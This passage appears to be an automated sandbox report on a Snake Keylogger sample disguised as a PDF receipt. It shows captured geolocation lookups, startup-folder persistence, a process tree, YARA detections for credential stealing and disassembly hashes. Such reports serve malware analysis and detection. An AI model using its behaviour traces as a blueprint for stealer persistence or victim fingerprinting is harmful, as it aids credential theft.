6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49759	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:40 UTC	63	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-28 18:04:40 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:40 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61311 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Usq5hqPaeNGnFEUpLAwsQGhRcmiEnbveCjNRQ9EO70khnjBLzE71SkaiadfGJMitnaa6a6CX%2Bt%2FX7HInjEHF1GZPujrfIntUXjL9QDbT6L1J6qYjY88SEGu1J4PgOdQw0zseBqgl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd980b86e2c87-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1111&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2413333&cwnd=251&unsent_bytes=0&cid=6f6834342edb6365&ts=184&x=0"
2024-10-28 18:04:40 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49761	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:42 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:42 UTC	877	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:42 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55343 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ks4faGBhfEcrH1mXDqUeshPWywqqzgcG4wHFfNOe00CBR4o6GhFkdvVDxdcu6YgrJB9MntuaKMpR49pmCN6BRR2ykzhn%2FBaQel9yjWqY2H6RES9bBo3SOer0GWu5ndb8POuftiYJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd98b4a99453f-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17465&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=164676&cwnd=32&unsent_bytes=0&cid=585e345b3d9dcf43&ts=170&x=0"
2024-10-28 18:04:42 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49763	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:43 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:43 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:43 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61314 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ELJaYXzFgGbB1OzR1WRMzNiIXA4rrkoKrj9LiPLW7syNcpB4CsV41xLFaWNf27uPzOG%2F%2Bnv1NNLQq08E8GMpXdLuuT3iGTDZODpcuVjuWdVSAcmXcuWOIZ%2BwMCRZ9L7ZTifzmcvP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd99598d5ead1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1095&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2403319&cwnd=249&unsent_bytes=0&cid=9eef775ba1ea55d6&ts=160&x=0"
2024-10-28 18:04:43 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49765	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:45 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:45 UTC	880	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:45 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVhc-iOyPHcEJSw= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 61316 Last-Modified: Mon, 28 Oct 2024 01:02:49 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=azdj7lWNbPtcvEEhMlpokBU2z0lwpeoeBXBUmets2x4BFXTaKJ3BFn4Qdx9WpAoFIr%2FHi8jJlTSOxW4W3gEpOQPFE8IPQQNJ3VvZU0VcDR7faT%2BI7bPFRtl2so61Ym0e2sRkzODK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd99fddda3ab2-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1134&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2475213&cwnd=251&unsent_bytes=0&cid=d41fef76b9b0d8be&ts=159&x=0"
2024-10-28 18:04:45 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49767	188.114.97.3	443	8028	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 18:04:47 UTC	87	OUT	GET /xml/155.94.241.188 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-28 18:04:47 UTC	883	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 18:04:47 GMT Content-Type: text/xml Content-Length: 358 Connection: close apigw-requestid: AVwB0hEZPHcEJng= Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 55348 Last-Modified: Mon, 28 Oct 2024 02:42:19 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UFKumhxDo1r0aX1TEKcKVoSnIfybDV6hvQFExpoj%2B1GqZ817BY1E0RNY13qYM0asC78%2FjTX%2FMhTswh%2FxvDJ81SlITkkRjNc50M8VKGcZZFa1rH6aN8FjS6cOP3UJ2Eg4YbAY76Mc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cd9aa9cb9bfdd-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20292&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=142984&cwnd=32&unsent_bytes=0&cid=f412d8213bfbcb2f&ts=178&x=0"
2024-10-28 18:04:47 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.188</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Target ID:	0
Start time:	14:04:05
Start date:	28/10/2024
Path:	C:\Users\user\Desktop\dekont_001.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dekont_001.pdf.exe"
Imagebase:	0x550000
File size:	76'288 bytes
MD5 hash:	D998DA7BE623B6299E9257FCF5F80E3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1844604505.0000000006770000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:04:14
Start date:	28/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x990000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.4212250311.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4215771932.0000000003054000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4215771932.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	14:04:23
Start date:	28/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbs"
Imagebase:	0x7ff7ba150000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:04:23
Start date:	28/10/2024
Path:	C:\Users\user\AppData\Roaming\RequiredContract.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\RequiredContract.exe"
Imagebase:	0xe40000
File size:	76'288 bytes
MD5 hash:	D998DA7BE623B6299E9257FCF5F80E3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2012152493.000000000364C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2023138995.000000000426A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:04:32
Start date:	28/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x7b0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4215341701.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4215341701.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Function 026E55E1 Relevance: 8.9, Strings: 6, Instructions: 1449COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E4610
jjjjjj, xrefs: 026E4558
$kq, xrefs: 026E45FA
4'kq, xrefs: 026E5622
TJpq, xrefs: 026E45CE
$kq, xrefs: 026E560E

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: 4'kq$TJpq$jjjjjj$$kq$$kq$$kq
API String ID: 0-3676134137
Opcode ID: 0c0538caa3365ee618640d9a6628ffcb6a1f4264bfb4311ceb898ca39a85565a
Instruction ID: 3e824e8f408f62c6db6140e48b7284093a9861d9a309ce60a1faeed45c42c26a
Opcode Fuzzy Hash: 0c0538caa3365ee618640d9a6628ffcb6a1f4264bfb4311ceb898ca39a85565a
Instruction Fuzzy Hash: 11E2277A250500EFDB4A9F98D948D55BBB2FF4D72471A85D8F20A9B232C732D861EF40

Function 026E569F Relevance: 8.9, Strings: 6, Instructions: 1448COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E4610
jjjjjj, xrefs: 026E4558
TJpq, xrefs: 026E5B2A
$kq, xrefs: 026E45FA
*), xrefs: 026E5A93
TJpq, xrefs: 026E45CE

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
API String ID: 0-998880824
Opcode ID: 4819d2d3d28dbd2cbd19bb071dba0a21baaf0b7993ab684e41a328dd55f99488
Instruction ID: 3aec863259d6932229ae40a672798f68f3c402479d8da72a94c3254d7282db27
Opcode Fuzzy Hash: 4819d2d3d28dbd2cbd19bb071dba0a21baaf0b7993ab684e41a328dd55f99488
Instruction Fuzzy Hash: 3EE2277A250500EFDB4A9F98D948D55BBB2FF4D72471A85D8F20A9B232C732D861EF40

Function 026E43F4 Relevance: 7.5, Strings: 6, Instructions: 7COMMON

Download Yara Rule

Strings

$kq, xrefs: 026E4610
jjjjjj, xrefs: 026E4558
TJpq, xrefs: 026E5B2A
$kq, xrefs: 026E45FA
*), xrefs: 026E5A93
TJpq, xrefs: 026E45CE

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq$TJpq$jjjjjj$$kq$$kq
API String ID: 0-998880824
Opcode ID: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
Instruction ID: 5c889580217ca7a692618621252544622930c36e29c4b9085a67731bca4eaa4b
Opcode Fuzzy Hash: f2481dbef01562eccf883da24f3dcbdf75b9fa485ae480a87904751164d2512c
Instruction Fuzzy Hash: 0EB0929280F781DE8B024EA889C01607F24AEA228235DC4E6C4860E44BC0258687E332

Function 026E3FF0 Relevance: 5.2, Strings: 4, Instructions: 208COMMON

Download Yara Rule

Strings

d%qq, xrefs: 026E410B
$kq, xrefs: 026E426D
$kq, xrefs: 026E4261
d%qq, xrefs: 026E419D

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: d%qq$d%qq$$kq$$kq
API String ID: 0-2487373968
Opcode ID: c2eed270d33fc50548786b49f1e57a19743ac7596cf8557a50d2f7b89062e9b4
Instruction ID: 605872af6c7904ad79f9a8b481db1aa8205f97dddde2ae647641cbde39224766
Opcode Fuzzy Hash: c2eed270d33fc50548786b49f1e57a19743ac7596cf8557a50d2f7b89062e9b4
Instruction Fuzzy Hash: C761D330B05244CFCB189B798C9477A7AA6AF85300F24497AD4179B3E9DE3ADD42C792

Function 026E5A3C Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

TJpq, xrefs: 026E5B2A
*), xrefs: 026E5A93

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq
API String ID: 0-3541879849
Opcode ID: eefd21f1f7ba588a82a35da00ef6aa52511a6b12e3a97a03efd8773d4c7af398
Instruction ID: b5e07123e370ce401aade92bffa7da6a2d20f4a29e2c4d03cb45a46fc9ef952a
Opcode Fuzzy Hash: eefd21f1f7ba588a82a35da00ef6aa52511a6b12e3a97a03efd8773d4c7af398
Instruction Fuzzy Hash: 0351D4347006448FCB15DF78CA54AAEBBB2BF85724F148589E5568B3F1CB31AD0ADB40

Function 026E5A88 Relevance: 2.6, Strings: 2, Instructions: 147COMMON

Download Yara Rule

Strings

TJpq, xrefs: 026E5B2A
*), xrefs: 026E5A93

Memory Dump Source

Source File: 00000000.00000002.1829275292.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_dekont_001.jbxd

Similarity

API ID:
String ID: *)$TJpq
API String ID: 0-3541879849
Opcode ID: 393331ccdc372f4f5cb751fa410399946a25174c41a951f09850c185f7cf4bc9
Instruction ID: ee4131011a1eb07b333210eb550d1a710cfbaed40ef1ea576bb2591281c4b851
Opcode Fuzzy Hash: 393331ccdc372f4f5cb751fa410399946a25174c41a951f09850c185f7cf4bc9
